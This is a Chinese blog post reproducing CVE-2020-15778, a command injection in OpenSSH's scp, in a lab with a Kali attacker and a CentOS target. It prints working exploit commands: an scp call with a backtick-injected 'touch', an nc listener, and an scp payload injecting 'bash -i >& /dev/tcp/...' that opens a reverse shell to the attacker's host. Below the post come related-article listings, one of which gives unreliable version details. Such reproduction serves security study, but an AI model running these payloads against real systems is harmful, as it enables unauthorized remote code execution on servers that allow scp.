查看openssh版本_OpenSSH 命令注入漏洞(CVE202015778)复现

最新推荐文章于 2024-05-16 15:09:44 发布
最新推荐文章于 2024-05-16 15:09:44 发布
阅读量779 收藏 1
点赞数
文章标签: 查看openssh版本

b642bf435b8d68b69c59b002509aee15.gif

漏洞详情

漏洞说明#

OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

漏洞编号#

CVE-2020-15778

影响范围#

OpenSSH <= 8.3p1 

危害等级#

高危

利用条件#

知道目标的ssh密码

修复建议#

先确保ssh密码没有泄露,等一波openssh的新版本吧

实验环境

攻击机:kali 2020.2 192.168.247.130

靶机:CentOS 7       192.168.247.129

aa37031f981fe95f2d3a142d205b6993.png

复现步骤

查看ssh版本

8d41616f7e2fde4a322d6e8907d4c714.png

首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件

scp 1.txt root@192.168.247.129:'`touch /tmp/test.txt` /tmp'

1f8590a17f7b16d1f5bf59d340d0d9cd.png

直接进行nc反弹获取shell

nc -lvvp 7777

进行反弹shell

scp test.txt root@192.168.247.129:'`bash -i >& /dev/tcp/192.168.247.130/7777 0>&1`/tmp/test1.txt'

53581ed6e7f54be8dbcddfd2c449b6f8.png

查看反弹的shell

f6c46d90b647f303b11aeb4d756e15a3.png

总结:需要知道ssh密码,主要针对知道ssh密码却不给登录,但是允许使用scp传文件这样就可进行反弹shell获取权限了。

aa37031f981fe95f2d3a142d205b6993.png

c91619c537355ce0c284431caccea9b8.gif 89da7c6040099cf1cef7fdf4a6e90c37.png

Hi  这里是白泽Sec~

如果你想了解更多公众号的信息,

欢迎关注我哦~

既然在看了,就点一下吧!!

weixin_39561179
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Linux】CentOS升级openssh到最新版
sparr0w的博客
09-24 3113
本篇主要针对漏洞扫描结果中,openssh旧版漏洞的修复。
查看openssh版本_OpenSSH使用教程
weixin_39631467的博客
12-09 5069
SSH是Secure Shell的缩写,意为"安全外壳协议",是一种可以远程登录提供安全保障的协议,使用SSH,可以把所有传输的数据进行加密,"中间人"攻击方式就不可能实现,防止DNS欺骗和IP欺骗.OpenSSH是SSH协议的免费开源的实现,可以通过OpenSSH的方式让Mac远程登录到iPhone通过WiFi远程登录在iPhone上通过Cydia安装OpenSSH工具(软件源http...
centos7升级最新版openssh&&openssl
jess的博客
05-05 2154
openssh&&openssl升级
OpenSSH 命令注入漏洞(CVE-2020-15778)修复教程_openssh_8(1)
最新发布
m0_60607927的博客
05-16 477
2021年来,云主机进行了漏洞扫描,出现了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1603
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
Centos升级openssh
pursue.dreams的博客
09-02 1354
linux-centos 7升级openssh版本为最新版本
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞
01-17
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞OpenSSH是使用SSH协议进行远程登录的首要连接工具。它对所有流量进行加密,以消除窃听、连接劫持和其他攻击。此外,OpenSSH提供了一大套安全隧道功能、几...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041)是一个严重的安全漏洞,需要紧急升级 OpenSSH 和 OpenSSL 到最新版本。通过按照上述步骤升级,能够有效地解决该漏洞,保护服务器的安全和稳定性。 五、结论 OpenSSH 资源...
OpenSSH 用户名枚举漏洞(CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-15778 openssh漏洞修复
N07ME的博客
12-11 6830
漏洞描述 https://access.redhat.com/security/cve/cve-2020-15778 简单来说,就是scp命令是可以注入特殊字段,在目标主机上执行指令的。 原理是因为scp是通过ssh实现的,一样的需要用户名和密码才能登陆。也就是说,这个漏洞其实针对的是那些禁用了ssh但是没禁用scp的主机,针对这些主机,可以从外部通过scp实现和ssh一样的功能。 漏洞修复方案 1.升级到openssh-8.4以上的版本 (要求操作系统版本centos 8及以上) 2.禁用scp命令 m
CentOS升级openssh
qq_26057083的博客
03-24 2954
公司几台服务器扫出了几个openssh相关的漏洞,解决办法就是升级openssh版本。升级过程中踩坑较多,故作此博客记录。
Centos7 升级OpenSSH 8.5
一颗学徒
08-02 614
此脚本主要针对SSH服务加密漏洞扫描,故升级为SSL协议版本为8.5。
openssh-浅谈openssl和openssh的升级
做人如果没有梦想,那跟咸鱼有什么区别--周星驰
08-18 6987
最近项目上有服务器漏洞被扫描出来,是关于openssl的 之前没怎么关注过这个问题,于是着手去了解了以下 发现有些坑,分享下自己的经验。 中间过程比较长,想省事的直接跳到第四节,解决漏洞观看 ...
CVE-2020-15778:OpenSSH命令注入漏洞复现
黑白的博客
11-15 1300
声明 好好学习,天天向上 漏洞描述 OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 影
命令注入_漏洞修复——OpenSSH 命令注入漏洞
weixin_39715538的博客
12-30 1170
CNNVD编号:CNNVD-202007-1519危害等级:高危CVE编号:CVE-2020-15778漏洞类型:操作系统命令注入发布时间:2020-07-24威胁类型:本地更新时间:2020-11-13漏洞简介OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传...
CVE-2020-15778漏洞修复方案
qq_33470881的博客
03-25 6913
CVE-2020-15778漏洞修复方案 临时缓解措施: 可以禁用scp,改用rsync等缓解风险(可能会导致小文件机器内拷贝变慢) 禁用scp命令(此方法不影响ssh使用) mv /usr/bin/scp /usr/bin/scp.bak 恢复scp命令 mv /usr/bin/scp.bak /usr/bin/scp ...
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值